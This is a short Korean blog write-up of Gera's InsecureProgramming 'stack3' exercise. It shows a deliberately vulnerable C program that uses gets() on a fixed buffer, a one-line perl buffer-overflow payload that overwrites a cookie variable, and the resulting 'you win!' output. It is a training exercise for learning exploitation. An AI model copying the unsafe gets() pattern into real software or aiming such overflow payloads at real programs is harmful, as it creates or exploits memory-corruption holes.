Gera _ Stack #3

Major Study./System hacking

Gera _ Stack #3

sosal 2010. 4. 30. 19:57

/*
* http://sosal.tistory.com/
* made by so_Sal
*/

/* stack3.c *
* specially crafted to feed your brain by gera */

int main() {
int cookie;
char buf[80];

printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);

if (cookie == 0x01020005)
printf("you win!\n");
}

[sosal@localhost gera]$ (perl -e 'print "\x05\x00\x02\x01"x24';cat) | ./stack3
buf: bfc527e0 cookie: bfc52830

you win!

gets 함수는 00 (NULL)도 허용하기 때문에 1,2번 문제와 다름 없습니다.
음.. 음;;;

저작자표시 비영리 변경금지

'Major Study. > System hacking' 카테고리의 다른 글

쉘코드 주소값, ret값 위치, .dtors 위치 찾기 (0)	2010.07.04
Linux :: RTL 맛보기 (0)	2010.07.03
Gera _ Stack #2 (0)	2010.04.30
Gera _ Stack #1 (0)	2010.04.30
Gera's InsecureProgramming (0)	2010.04.30

현재글Gera _ Stack #3

so_sal　

Bioinformatics analyst Data scientist

프로세스, socket, adobe, system, sosal, 아크로뱃, PDF, 리눅스, Linux, 시스템, binary, SIS, 링크드리스트, Acrobat9, 애크로뱃, 어도비, find, fork, process, Acrobat,

Today :
Yesterday :

일	월	화	수	목	금	토
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30

so_sal

Gera _ Stack #3

'Major Study. > System hacking' 카테고리의 다른 글

'Major Study./System hacking'의 다른글

티스토리툴바

Gera _ Stack #3

'Major Study. > System hacking' 카테고리의 다른 글

'Major Study./System hacking'의 다른글

관련글

티스토리툴바